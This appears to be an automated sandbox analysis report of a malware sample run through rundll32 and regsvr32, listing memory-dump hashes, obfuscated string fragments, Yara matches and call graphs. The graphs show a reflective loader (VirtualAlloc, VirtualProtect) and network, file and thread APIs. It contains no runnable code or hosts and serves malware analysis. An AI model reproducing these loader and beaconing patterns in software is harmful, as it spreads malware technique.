                                                                                                                            • String ID: #X$'Xsa$iJ6$vG
                                                                                                                            • API String ID: 0-746338152
                                                                                                                            • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                            • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                            • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                            • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: *i^$MIC$-Z$]2
                                                                                                                            • API String ID: 0-498664264
                                                                                                                            • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                            • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                            • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                            • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: B$EG$QsF$_
                                                                                                                            • API String ID: 0-784369960
                                                                                                                            • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                            • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                            • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                            • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -`G$.$5B.Y$Z`35
                                                                                                                            • API String ID: 0-1363032466
                                                                                                                            • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                            • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                            • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                            • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: *+_$WSh$\O$#o
                                                                                                                            • API String ID: 0-1846314129
                                                                                                                            • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                            • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                            • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                            • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: .B$O$M*K$\<
                                                                                                                            • API String ID: 0-3225238681
                                                                                                                            • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                            • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                            • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                            • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $$$$xVO$~O
                                                                                                                            • API String ID: 0-3655128719
                                                                                                                            • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                            • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                            • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                            • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,IW$G$JMg$l
                                                                                                                            • API String ID: 0-1370644289
                                                                                                                            • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                            • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                            • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                            • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.279543824.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,$,$2S=$i`}G
                                                                                                                            • API String ID: 0-4285990414
                                                                                                                            • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                            • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                            • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                            • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:19%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:5%
                                                                                                                            Total number of Nodes:80
                                                                                                                            Total number of Limit Nodes:9
                                                                                                                            execution_graph 3902 18001aca4 3907 18001ad22 3902->3907 3903 18001ba75 3907->3903 3908 180012b50 3907->3908 3911 18000a4fc 3907->3911 3914 18001cec4 3907->3914 3910 180012b8a 3908->3910 3909 180012bfb InternetOpenW 3909->3907 3910->3909 3913 18000a572 3911->3913 3912 18000a5f0 HttpOpenRequestW 3912->3907 3913->3912 3916 18001cf4a 3914->3916 3915 18001cfe2 InternetConnectW 3915->3907 3916->3915 3917 180015388 3920 1800227d4 3917->3920 3919 1800153e3 3924 18002281d 3920->3924 3922 180024315 3922->3919 3924->3922 3926 18001c05c 3924->3926 3930 18001c568 3924->3930 3937 180017908 3924->3937 3928 18001c0af 3926->3928 3929 18001c2e1 3928->3929 3941 18002ad58 3928->3941 3929->3924 3933 18001c58a 3930->3933 3932 18001c948 3932->3924 3933->3932 3948 180003598 3933->3948 3952 18000ac48 3933->3952 3956 180025dac 3933->3956 3960 1800097c0 3933->3960 3939 180017932 3937->3939 3938 180015e2c CreateThread 3938->3939 3939->3938 3940 180017bcd 3939->3940 3940->3924 3944 1800046a8 3941->3944 3943 18002ae38 3943->3928 3946 1800046ec 3944->3946 3945 180004982 3945->3943 3946->3945 3947 180004945 Process32FirstW 3946->3947 3947->3946 3950 180003640 3948->3950 3949 1800044c0 3949->3933 3950->3949 3964 18001ed50 3950->3964 3954 18000ac8e 3952->3954 3953 18000b5fe 3953->3933 3954->3953 3955 18001ed50 CreateFileW 3954->3955 3955->3954 3959 180025dde 3956->3959 3958 180026180 3958->3933 3959->3958 3971 180015e2c 3959->3971 3961 1800097fc 3960->3961 3962 18000981d 3961->3962 3963 18001ed50 CreateFileW 3961->3963 3962->3933 3963->3961 3966 18001ed7a 3964->3966 3967 18001f06b 3966->3967 3968 18000fb00 3966->3968 3967->3950 3970 18000fb80 3968->3970 3969 18000fc15 CreateFileW 3969->3966 3970->3969 3972 180015ea5 3971->3972 3973 180015f3b CreateThread 3972->3973 3973->3959 3974 180015e2c 3975 180015ea5 3974->3975 3976 180015f3b CreateThread 3975->3976 3977 18001496c 3978 1800149ce 3977->3978 3979 18000fb00 CreateFileW 3978->3979 3980 1800152ba 3978->3980 3979->3978 3981 180024d80 3983 180024eed 3981->3983 3982 1800250bd 3983->3982 3985 180019a30 3983->3985 3986 180019aa4 3985->3986 3987 180019b2a GetVolumeInformationW 3986->3987 3987->3982 3988 ff0000 3989 ff0183 3988->3989 3990 ff043e VirtualAlloc 3989->3990 3994 ff0462 3990->3994 3991 ff0a7b 3992 ff0531 GetNativeSystemInfo 3992->3991 3993 ff056d VirtualAlloc 3992->3993 3998 ff058b 3993->3998 3994->3991 3994->3992 3995 ff0a00 3995->3991 3996 ff0a56 RtlAddFunctionTable 3995->3996 3996->3991 3997 ff09d9 VirtualProtect 3997->3998 3998->3995 3998->3997

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 0 ff0000-ff0460 call ff0aa8 * 2 VirtualAlloc 22 ff048a-ff0494 0->22 23 ff0462-ff0466 0->23 26 ff049a-ff049e 22->26 27 ff0a91-ff0aa6 22->27 24 ff0468-ff0488 23->24 24->22 24->24 26->27 28 ff04a4-ff04a8 26->28 28->27 29 ff04ae-ff04b2 28->29 29->27 30 ff04b8-ff04bf 29->30 30->27 31 ff04c5-ff04d2 30->31 31->27 32 ff04d8-ff04e1 31->32 32->27 33 ff04e7-ff04f4 32->33 33->27 34 ff04fa-ff0507 33->34 35 ff0509-ff0511 34->35 36 ff0531-ff0567 GetNativeSystemInfo 34->36 37 ff0513-ff0518 35->37 36->27 38 ff056d-ff0589 VirtualAlloc 36->38 41 ff051a-ff051f 37->41 42 ff0521 37->42 39 ff058b-ff059e 38->39 40 ff05a0-ff05ac 38->40 39->40 43 ff05af-ff05b2 40->43 44 ff0523-ff052f 41->44 42->44 46 ff05b4-ff05bf 43->46 47 ff05c1-ff05db 43->47 44->36 44->37 46->43 48 ff05dd-ff05e2 47->48 49 ff061b-ff0622 47->49 50 ff05e4-ff05ea 48->50 51 ff06db-ff06e2 49->51 52 ff0628-ff062f 49->52 53 ff05ec-ff0609 50->53 54 ff060b-ff0619 50->54 56 ff06e8-ff06f9 51->56 57 ff0864-ff086b 51->57 52->51 55 ff0635-ff0642 52->55 53->53 53->54 54->49 54->50 55->51 60 ff0648-ff064f 55->60 61 ff0702-ff0705 56->61 58 ff0917-ff0929 57->58 59 ff0871-ff087f 57->59 64 ff092f-ff0937 58->64 65 ff0a07-ff0a1a 58->65 66 ff090e-ff0911 59->66 67 ff0654-ff0658 60->67 62 ff06fb-ff06ff 61->62 63 ff0707-ff070a 61->63 62->61 69 ff070c-ff071d 63->69 70 ff0788-ff078e 63->70 72 ff093b-ff093f 64->72 84 ff0a1c-ff0a27 65->84 85 ff0a40-ff0a4a 65->85 66->58 71 ff0884-ff08a9 66->71 68 ff06c0-ff06ca 67->68 76 ff06cc-ff06d2 68->76 77 ff065a-ff0669 68->77 73 ff071f-ff0720 69->73 74 ff0794-ff07a2 69->74 70->74 92 ff08ab-ff08b1 71->92 93 ff0907-ff090c 71->93 78 ff09ec-ff09fa 72->78 79 ff0945-ff095a 72->79 83 ff0722-ff0784 73->83 86 ff085d-ff085e 74->86 87 ff07a8 74->87 76->67 88 ff06d4-ff06d5 76->88 80 ff066b-ff0678 77->80 81 ff067a-ff067e 77->81 78->72 82 ff0a00-ff0a01 78->82 90 ff095c-ff095e 79->90 91 ff097b-ff097d 79->91 96 ff06bd-ff06be 80->96 97 ff068c-ff0690 81->97 98 ff0680-ff068a 81->98 82->65 83->83 101 ff0786 83->101 102 ff0a38-ff0a3e 84->102 104 ff0a4c-ff0a54 85->104 105 ff0a7b-ff0a8e 85->105 86->57 103 ff07ae-ff07d4 87->103 88->51 94 ff096e-ff0979 90->94 95 ff0960-ff096c 90->95 99 ff097f-ff0981 91->99 100 ff09a2-ff09a4 91->100 114 ff08bb-ff08c8 92->114 115 ff08b3-ff08b9 92->115 93->66 106 ff09be-ff09bf 94->106 95->106 96->68 110 ff06a5-ff06a9 97->110 111 ff0692-ff06a3 97->111 107 ff06b6-ff06ba 98->107 108 ff0989-ff098b 99->108 109 ff0983-ff0987 99->109 112 ff09ac-ff09bb 100->112 113 ff09a6-ff09aa 100->113 101->74 102->85 116 ff0a29-ff0a35 102->116 131 ff07d6-ff07d9 103->131 132 ff0835-ff0839 103->132 104->105 117 ff0a56-ff0a79 RtlAddFunctionTable 104->117 105->27 120 ff09c5-ff09cb 106->120 107->96 108->100 118 ff098d-ff098f 108->118 109->106 110->96 119 ff06ab-ff06b3 110->119 111->107 112->106 113->106 122 ff08ca-ff08d1 114->122 123 ff08d3-ff08e5 114->123 121 ff08ea-ff08fe 115->121 116->102 117->105 126 ff0999-ff09a0 118->126 127 ff0991-ff0997 118->127 119->107 128 ff09cd-ff09d3 120->128 129 ff09d9-ff09e9 VirtualProtect 120->129 121->93 139 ff0900-ff0905 121->139 122->122 122->123 123->121 126->120 127->106 128->129 129->78 136 ff07db-ff07e1 131->136 137 ff07e3-ff07f0 131->137 133 ff083b 132->133 134 ff0844-ff0850 132->134 133->134 134->103 138 ff0856-ff0857 134->138 140 ff0812-ff082c 136->140 141 ff07fb-ff080d 137->141 142 ff07f2-ff07f9 137->142 138->86 139->92 140->132 144 ff082e-ff0833 140->144 141->140 142->141 142->142 144->131
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.662563725.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_ff0000_regsvr32.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                            • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                            • API String ID: 394283112-2517549848
                                                                                                                            • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction ID: 78424f6c4189757e1bc7e71765057e1fcc87475b4f391d7e70362aba67b7a169
                                                                                                                            • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                            • Instruction Fuzzy Hash: 6772E731A18B4C8BCB29DF18C8856B9B7E1FF98305F14462DE98AD7212EF34D542CB85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: #X$Ec;$J$^c$^c$n
                                                                                                                            • API String ID: 0-2929744921
                                                                                                                            • Opcode ID: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                            • Instruction ID: 2841c3f5e183e4376706155e5f630a85a86355917b0bfec54de2fd5c82beda78
                                                                                                                            • Opcode Fuzzy Hash: 4bf1a5684c4273f47db2f7bfe37ec9194a020a583a1b353a94edbff9173a6149
                                                                                                                            • Instruction Fuzzy Hash: DB0214705187C88BC798DFA8C48965EFBE1FB98744F108A1DF48687660DBF4D948CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 634 1800132f0-18001332a 635 18001332c-180013331 634->635 636 1800136a3 635->636 637 180013337-18001333c 635->637 638 1800136a8-1800136ad 636->638 639 180013342-180013347 637->639 640 1800135f0-18001368c call 180021434 637->640 638->635 641 1800136b3-1800136b6 638->641 639->638 643 18001334d-1800133c6 call 18001a754 639->643 647 180013691-180013697 640->647 645 180013759-180013760 641->645 646 1800136bc-180013757 call 180013e28 641->646 649 1800133cb-1800133d0 643->649 651 180013763-18001377d 645->651 646->651 647->641 648 180013699-18001369e 647->648 652 1800135e2-1800135eb 648->652 649->646 653 1800133d6-1800133db 649->653 652->635 653->641 655 1800133e1-1800133e6 653->655 655->652 656 1800133ec-1800134a8 call 180021434 655->656 656->641 659 1800134ae-1800135dc call 180016428 call 180013e28 656->659 659->641 659->652
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: =_$F)k$b/$syG
                                                                                                                            • API String ID: 0-3955183656
                                                                                                                            • Opcode ID: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                            • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                            • Opcode Fuzzy Hash: 78e362ff9fa706a76cdd339057cb87764c88e196f3f9d59d0d5946dc172ac972
                                                                                                                            • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 5IF$P)#
                                                                                                                            • API String ID: 0-1025399686
                                                                                                                            • Opcode ID: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                            • Instruction ID: ff53fea05c8e9f3baddf865253a509f05c382ca6cc85a3c859ee45a04624b947
                                                                                                                            • Opcode Fuzzy Hash: f542572e4f2ff63548a52b2cdf5e12f4f3f89a6a74df4dd4d6ea84f2146f04ed
                                                                                                                            • Instruction Fuzzy Hash: 0B9182711197889FCBA9DF18C8857DEB7E0FB88744F90561DF84A8B260C7B4DA49CB42
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 584 18001cec4-18001cf6a call 1800142a0 587 18001cfe2-18001d01f InternetConnectW 584->587 588 18001cf6c-18001cfdc call 18000dd70 584->588 588->587
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ConnectInternet
                                                                                                                            • String ID: :G?$C
                                                                                                                            • API String ID: 3050416762-1225920220
                                                                                                                            • Opcode ID: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                            • Instruction ID: f2a8b8884ccc4c3404819a5ba5e10ed0cdd0f68caef2c301b3e7290f999a0a2a
                                                                                                                            • Opcode Fuzzy Hash: 76a7b635ccb7068e30ecf2b503a3beb8f1d88f81d4224a3a6f9b87d06452e60c
                                                                                                                            • Instruction Fuzzy Hash: 5941F67450CB888FD7A8DF18D0857AAB7E0FB98314F508A5EE8CDC7296DB749844CB46
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFile
                                                                                                                            • String ID: gF\
                                                                                                                            • API String ID: 823142352-1982329323
                                                                                                                            • Opcode ID: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                            • Instruction ID: 218d4d5182cb26b0f36475523bc21bdebfc34a2f4da3002633262ff40041eb9b
                                                                                                                            • Opcode Fuzzy Hash: 7df644aaf73cc9bcde4b6fb7fa72ed7f80eca5e2f74ec0139d961ef78fad827b
                                                                                                                            • Instruction Fuzzy Hash: 1931697051C7848BD778DF28D48679ABBE0FB89304F10891EE88DC3352DB709885CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: HttpOpenRequest
                                                                                                                            • String ID: :G?
                                                                                                                            • API String ID: 1984915467-1508054202
                                                                                                                            • Opcode ID: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                            • Instruction ID: 60d2efcdc3634c8de813e735c521a1a1b2f1d3197bf379f764bafd55f5181dd8
                                                                                                                            • Opcode Fuzzy Hash: 21630c4fbef06d8aacd4c702dff3e94d0932750c237c7792a79e645746d5d1eb
                                                                                                                            • Instruction Fuzzy Hash: 83314E7060CB848FDBA8DF18D08679BB7E0FB98315F50455DE88CC7296DB789944CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InternetOpen
                                                                                                                            • String ID: :G?
                                                                                                                            • API String ID: 2038078732-1508054202
                                                                                                                            • Opcode ID: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                            • Instruction ID: c9298170b99e71c9961e7bb575de84f4b40d7dd1197e6373e1c7e5d4160ea6d3
                                                                                                                            • Opcode Fuzzy Hash: 73d4d0fe1beb5fabfcdff42c943db3c290933a411410652e7bad060f5d798a44
                                                                                                                            • Instruction Fuzzy Hash: 6F110A71518B888BD3A4DF64D48979BB7E1FB88319F50CA1DF4D9C6250DB788589CB02
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2422867632-0
                                                                                                                            • Opcode ID: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                            • Instruction ID: c545beb4aab352fd45c13a3c06d211153dc7cc573a2023b45670cfe369ebb01f
                                                                                                                            • Opcode Fuzzy Hash: e7c4e665c3955ccb08a2ed1da7b867fe01ee184c9f438c553d3e32e703deb0b1
                                                                                                                            • Instruction Fuzzy Hash: 0731F67061CB448FD7A8DF68D48579ABBE0FB88304F508A5EE88CD7356DB349944CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.665142316.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InformationVolume
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2039140958-0
                                                                                                                            • Opcode ID: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                            • Instruction ID: 89e8e56e51c5a60af2ecd67268569f3ffacd31b875f751963744359e30ad4776
                                                                                                                            • Opcode Fuzzy Hash: 88af29f83271a8505691566097a2d6f523e627b34a42d7322f8369dcba0ae3fb
                                                                                                                            • Instruction Fuzzy Hash: 2B31407051CB448FD7A8DF18D4C579AB7E0FB88315F60855EE88CC7255CB749948CB86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%